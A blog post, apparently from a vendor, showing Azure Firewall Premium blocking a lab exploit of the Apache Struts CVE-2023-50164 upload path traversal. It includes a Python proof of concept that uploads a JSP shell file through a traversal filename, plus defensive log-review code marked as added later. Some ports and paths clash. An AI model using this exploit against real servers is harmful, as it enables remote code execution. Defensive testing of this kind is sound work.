Azure Firewall Protection Against Apache Struts Vulnerability - CVE-2023-50164

Introduction

 

Vulnerabilities and zero-day exploits continue to be a serious threat to systems worldwide. One such vulnerability is CVE-2023-50164, a critical issue in Apache Struts that can lead to critical security breaches if not properly mitigated. Protecting your systems from such vulnerabilities is paramount to prevent unauthorized access and data loss. Azure Firewall Premium provides a robust solution to safeguard your infrastructure against such threats. This blog post will explore the CVE-2023-50164 vulnerability and demonstrate how Azure Firewall Premium can effectively prevent this attack.

 

The Apache Struts Vulnerability - CVE-2023-50164

 

Apache Struts is a free-to-use, open-source framework designed for creating Java-based web applications. It follows the Model-View-Controller (MVC) design pattern, which helps separate the application logic, user interface, and control logic.

 

CVE-2023-50164, discovered in December 2023, is a critical vulnerability found in this framework. This vulnerability allows attackers to execute arbitrary code on the server, potentially leading to data breaches, system compromises, and other malicious activities. CVE-2023-50164 is a path traversal vulnerability resulting from flaws in the file upload logic. These flaws can allow an attacker to manipulate file upload parameters to enable path traversal, and in some cases, this can result in the uploading of a malicious file that can be used to perform Remote Code Execution.

 

This vulnerability affects Struts versions 2.5.32 and below and 6.3.0.1 and below. Users are recommended to upgrade to Struts version 2.5.33 (and greater) or Struts version 6.3.0.2 (and greater) to fix this issue. For more information on the vulnerability, affected versions and recommended upgrades refer to NVD - CVE-2023-50164 (nist.gov).

 

Azure Firewall Premium Protection

 

Whilst the recommendation is to upgrade an affected Apache Struts application to a patched version, upgrading the software may not be an option or may take too long. In such cases, attackers can take advantage of this vulnerability and attack your systems. Azure Firewall Premium provides comprehensive protection against this vulnerability through its Intrusion Detection and Prevention System (IDPS). Azure Firewall Premium is a cloud-native and intelligent network firewall security service that provides advanced threat protection that meets the needs of sensitive and regulated environments, such as the payment and healthcare industries.

 

The IDPS feature contains more than fifty categories with over 67,000 signature rules. The range of detection categories comprises malware command and control, phishing, trojans, botnets, informational events, exploits, vulnerabilities, SCADA network protocols, exploit kit activity, and numerous others. The Azure Firewall IDPS signatures are continuously updated in real-time to ensure protection against the latest zero-day threats with 20 to 40 new rules released each day.

 

To enable protection against the Apache Struts vulnerability in Azure Firewall Premium, IDPS must be enabled in either “Alert” or “Alert and Deny” mode. In “Alert” mode a signature match is only logged, while “Alert and Deny” also blocks the matching traffic. The signatures highlighted below prevent malicious attacks against Apache Struts.

 

[Screenshot: IDPS signatures]

 

Proof of Concept: Azure Firewall Blocking CVE-2023-50164

 

To simulate Azure Firewall Premium stopping an attack against a vulnerable Apache Struts application, we attempt a path traversal attack in a controlled demo environment using the setup below:

 

[Diagram: demo environment setup]

 

Our setup consists of:

  1. A Hub/central Virtual Network
  2. Azure Firewall Premium deployed in its AzureFirewallSubnet.
  3. A Kali Linux virtual machine which is deployed in an application subnet. We install Tomcat and a vulnerable version of Apache Struts.
  4. An Ubuntu Linux client machine (attacker machine).

 

Azure Firewall Premium Configuration

 

We configure our Azure Firewall Premium with DNAT rules to access the Kali Linux virtual machine. Inbound traffic towards the virtual machine is NATed on the Azure Firewall’s Public IP address before being translated to the internal server’s IP address:

 

[Screenshot: DNAT rules]

The translated ports – 22 and 8080 – allow SSH and HTTP (8080) access to the Kali Linux machine.

 

From the Azure Firewall Settings pane, under IDPS we set the IDPS mode to “Alert and Deny”.

 

[Screenshot: IDPS mode set to Alert and Deny]

 

Kali Linux Configuration

 

In our setup, we use Kali Linux to install a vulnerable Apache Struts application. We set up the server as below:

  1. Update and install dependencies - including Java Development Kit (JDK) and Python - with the commands below:

sudo apt update
sudo apt upgrade -y
sudo apt-get install git curl python3 unzip openjdk-11-jdk -y

  2. Next, we set the JAVA_HOME environment variable to ensure that Tomcat and other Java-dependent tools can consistently locate and use the correct Java installation. We use the commands below:

export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
export JRE_HOME=$JAVA_HOME
export PATH=$PATH:$JAVA_HOME/bin

  3. We download and install Tomcat (version 9.0.83) to provide a servlet container for running our Apache Struts web application. The commands below download, extract, configure, and start our Tomcat server:

cd /opt
sudo wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.83/bin/apache-tomcat-9.0.83.tar.gz
sudo tar xzf apache-tomcat-9.0.83.tar.gz
sudo chmod -R 755 /opt/apache-tomcat-9.0.83
sudo chmod +x /opt/apache-tomcat-9.0.83/bin/*.sh
sudo /opt/apache-tomcat-9.0.83/bin/startup.sh

 

We verify that the Tomcat server is running by checking the Tomcat server page in a web browser at “http://<Public_IP_Address>:9090”.

 

[Screenshot: Tomcat server page]

 

Apache Struts Deployment

 

In this step, we download and install a vulnerable Apache Struts application – version 2.5.10 - into our Kali Linux server. The commands below download and extract the Apache Struts version 2.5.10 archive, deploy the struts2-showcase application to the Tomcat server, and restart the Tomcat server to apply the changes.

 

cd /opt
sudo wget https://archive.apache.org/dist/struts/2.5.10/struts-2.5.10-all.zip
sudo unzip struts-2.5.10-all.zip -d /opt
sudo cp /opt/struts-2.5.10/apps/struts2-showcase.war /opt/apache-tomcat-9.0.83/webapps
sudo /opt/apache-tomcat-9.0.83/bin/shutdown.sh
sudo /opt/apache-tomcat-9.0.83/bin/startup.sh

 

To verify that our Apache Struts application is running, we navigate to the application’s web page in a browser using the URL “http://<Public_IP_Address>:9090/struts2-showcase/fileupload/upload.action”. If the application is running correctly, you should see the file upload page. This is the specific page that contains the vulnerable file upload functionality that we want to exploit. The page is displayed below:

 

[Screenshot: Struts file upload page]

 

Exploiting the vulnerability and Azure Firewall Premium Protection against it

 

On our attacker machine, we run a Python script that exploits the file upload vulnerability in our Apache Struts application. The script sends a specially crafted HTTP POST request to the vulnerable endpoint, attempting to upload a malicious JSP shell file (shell.jsp). This script demonstrates how an attacker could leverage this vulnerability to gain remote code execution (RCE) on the server.

 

  1. Navigate to your home directory and create a file named poc.py in the Nano text editor using the commands:

cd ~
nano poc.py

  2. Insert the following Python script into poc.py:

import requests

url = "http://<Public_IP_Address>:9090/struts2-showcase/fileupload/upload.action"

files = {
    'upload': ('shell.jsp', '<% out.println("RCE Test"); %>', 'application/octet-stream'),
    'uploadContentType': (None, 'application/octet-stream'),
    'uploadFileName': (None, '../../../../../../../../../../../../../../../../usr/share/tomcat9/webapps/ROOT/shell.jsp'),
    'caption': (None, 'exploit')
}

response = requests.post(url, files=files)

print(f"Status Code: {response.status_code}")
print(f"Response Text: {response.text}")

  3. Execute the above script using the command python3 poc.py (Note: in our test setup the script uses HTTP port 9090, because the DNAT rule translates this port to the server's actual port 8080).

 

We receive several errors as the connection is reset with Azure Firewall actively blocking the connection.

 

[Screenshot: connection reset errors returned to poc.py]
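The request shape used above (a file part plus a separate form field that carries the file name) can also be checked on the defender's side, for example in a reverse proxy or a log-replay job. The following Python is an added example, not code from the original post or from Azure Firewall; the function names, the flagging heuristic and the sample request body are assumptions constructed for illustration.

```python
import re
from email.parser import BytesParser
from email.policy import HTTP
from urllib.parse import unquote

# ".." as a whole path component, checked after one round of URL-decoding.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def has_traversal(value: str) -> bool:
    return bool(TRAVERSAL.search(unquote(value)))

def inspect_upload(content_type: str, body: bytes) -> list[str]:
    """Return findings for one multipart/form-data request body."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = BytesParser(policy=HTTP).parsebytes(raw)
    file_fields, form_fields, findings = set(), {}, []
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition") or ""
        filename = part.get_filename()
        if filename is not None:  # file part
            file_fields.add(name.lower())
            if has_traversal(filename) or "/" in filename or "\\" in filename:
                findings.append(f"{name}: path in filename attribute")
        else:  # ordinary form field
            data = part.get_payload(decode=True) or b""
            form_fields[name] = data.decode("utf-8", "replace")
    # Heuristic (assumption of this example): a form field named
    # <file field>FileName next to the file part is a client-chosen name.
    for name, value in form_fields.items():
        low = name.lower()
        if low.endswith("filename") and low[: -len("filename")] in file_fields:
            verdict = "traversal" if has_traversal(value) else "override"
            findings.append(f"{name}: filename {verdict} via form field")
    return findings

# Constructed request body with the same field layout as the page's script.
SAMPLE_TYPE = "multipart/form-data; boundary=XBOUND"
SAMPLE_BODY = (
    b'--XBOUND\r\n'
    b'Content-Disposition: form-data; name="upload"; filename="shell.jsp"\r\n'
    b'Content-Type: application/octet-stream\r\n\r\n'
    b'constructed test content\r\n'
    b'--XBOUND\r\n'
    b'Content-Disposition: form-data; name="uploadFileName"\r\n\r\n'
    b'../../../webapps/ROOT/shell.jsp\r\n'
    b'--XBOUND--\r\n'
)

if __name__ == "__main__":
    print(inspect_upload(SAMPLE_TYPE, SAMPLE_BODY))
```

A check like this complements the IDPS signature and the Struts upgrade; it does not replace either.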

 

Post Attack Investigation and Analysis

 

After simulating the attack on the vulnerable Apache Struts application, it's essential to investigate and confirm that Azure Firewall Premium effectively blocked the malicious activity. To achieve this, we can utilize Azure Firewall logs and also use the Copilot for Security integration for Azure Firewall.

 

Azure Firewall logs provide detailed visibility into the firewall's traffic and operations, helping us track and analyze the blocked attack. However, logs can be tough to parse manually, especially when log volume is extremely high. The integration of Azure Firewall with Copilot for Security significantly enhances our ability to investigate and respond to security incidents with ease. Copilot for Security leverages powerful AI-driven tools to streamline the investigation process, offering insights and recommendations based on the analyzed Azure Firewall IDPS logs and helping you respond with the speed and scale of AI.

 

Investigating with Azure Firewall Logs

 

To view the Azure Firewall IDPS logs, we navigate to our Azure Firewall and select Logs under the Monitoring section. We run the query below on the AZFWIdpsSignature table:

 

AZFWIdpsSignature
| take 100

 

From the results, we can clearly observe that the malicious traffic was dropped.

[Screenshots: IDPS log entries showing the blocked traffic]
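When the query results are exported for review, the useful question is whether every match on the signature was actually blocked, since a hit that was only alerted on still reached the server. The Python below is an added example, not part of the original post; the column names (TimeGenerated, SourceIp, SignatureId, Action), the action spellings and the sample rows are assumptions constructed for illustration, with signature ID 2049667 taken from this page.

```python
from collections import Counter, defaultdict

# Assumed spellings of a blocking action in the exported rows.
BLOCKING_ACTIONS = {"deny", "drop"}

def triage(rows, signature_id):
    """Summarise hits on one IDPS signature and list sources that got through."""
    hits = [r for r in rows if str(r.get("SignatureId")) == str(signature_id)]
    per_source = defaultdict(Counter)
    for r in hits:
        per_source[r["SourceIp"]][r["Action"].strip().lower()] += 1
    # A source with any non-blocking action had at least one request pass the firewall.
    not_blocked = sorted(
        src for src, actions in per_source.items()
        if any(a not in BLOCKING_ACTIONS for a in actions)
    )
    times = sorted(r["TimeGenerated"] for r in hits)  # ISO-8601 strings sort by time
    return {
        "hits": len(hits),
        "by_action": dict(sum(per_source.values(), Counter())),
        "first_seen": times[0] if times else None,
        "last_seen": times[-1] if times else None,
        "not_blocked_sources": not_blocked,
    }

def _row(ts, src, sig, action):
    return {"TimeGenerated": ts, "SourceIp": src, "SignatureId": sig, "Action": action}

# Constructed rows (documentation IP ranges); "1234567" is a made-up unrelated signature.
SAMPLE_ROWS = [
    _row("2024-07-31T10:02:11Z", "203.0.113.7", "2049667", "Deny"),
    _row("2024-07-31T10:02:14Z", "203.0.113.7", "2049667", "Deny"),
    _row("2024-07-31T09:40:03Z", "198.51.100.23", "2049667", "Alert"),
    _row("2024-07-31T10:05:00Z", "203.0.113.7", "1234567", "Alert"),
]

if __name__ == "__main__":
    print(triage(SAMPLE_ROWS, 2049667))
```

Any address listed under not_blocked_sources warrants a check of the web server itself, for example for unexpected files under the Tomcat webapps directory.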

 

Enhancing the Investigation with Copilot for Security

 

Using the Copilot for Security integration with Azure Firewall, we can perform detailed investigations of the malicious traffic intercepted by IDPS. Copilot for Security allows us to swiftly investigate and analyze the attack using natural language prompts, providing detailed actionable results. The currently supported capabilities in this integration include:

  1. Viewing top signature hits.
  2. Getting details on an IDPS signature.
  3. Searching across firewalls for an IDPS signature.
  4. Generating recommendations to secure your environment using IDPS.

To use Copilot for Security with Azure Firewall, log into the Copilot for Security standalone portal associated with your environment and enable the Azure Firewall plugin:

 

[Screenshot: Azure Firewall plugin enabled in Copilot for Security]

To learn more about the Copilot for Security integration with Azure Firewall, see Azure Firewall integration in Microsoft Copilot for Security (preview) | Microsoft Learn.

 

We start a new session and can use the prompts below to get details related to our attack scenario:

  1. Show me a summary of the top 5 high severity attacks related to known CVEs that have been stopped by the Azure Firewall - <Firewall Name> - in the last 12 hours. Provide the output in tabular format for easier readability.
  2. Tell me more about the Apache Struts vulnerability (CVE-2023-50164).
  3. Was signature ID 2049667 only stopped by this one Firewall? What about others across this entire tenant?
  4. What strategies can be implemented in my Azure Firewall and across my environment, to effectively guard against vulnerabilities similar to CVE-2023-50164?

Show me a summary of the top 5 high severity attacks related to known CVEs that have been stopped by the Azure Firewall - <Firewall_Name> in the last 12 hours. Provide the output in tabular format for easier readability:

[Screenshot: Copilot for Security response with the top signature hits]

As you can see, Copilot automatically detects that there are multiple signatures associated with the same CVE and it alerts you to that information. You can also click on the button in the top right corner to expand the table to see all the log information available.

 

Tell me more about the Apache Struts vulnerability (CVE-2023-50164):

[Screenshot: Copilot for Security response describing CVE-2023-50164]

Instead of having to go research the CVE yourself using external tools, you can simply ask Copilot to tell you about this CVE and why it is malicious.

 

Was signature ID 2049667 only stopped by this one Firewall? What about others across this entire tenant?

[Screenshot: Copilot for Security response for the search across firewalls]

You can also have Copilot search across your entire infrastructure for this attack to make sure you are not vulnerable elsewhere.

 

What strategies can be implemented in my Azure Firewall and across my environment, to effectively guard against vulnerabilities similar to CVE-2023-50164?

[Screenshot: Copilot for Security recommendations for Azure Firewall]

 

Conclusion

 

CVE-2023-50164 is a serious vulnerability in Apache Struts that can lead to severe security breaches. While upgrading to the latest version of Struts is the best way to mitigate this vulnerability, Azure Firewall Premium offers an additional layer of protection with its advanced threat detection and prevention capabilities. Implementing Azure Firewall Premium can safeguard your systems from potential exploits and maintain a secure environment. Furthermore, integrating Azure Firewall Premium with Copilot for Security enhances your ability to investigate and respond to security incidents. This powerful combination not only blocks threats but also provides detailed insights and actionable recommendations to fortify your security posture. Implementing these tools ensures comprehensive protection and swift response to security threats, keeping your infrastructure safe and secure.

 
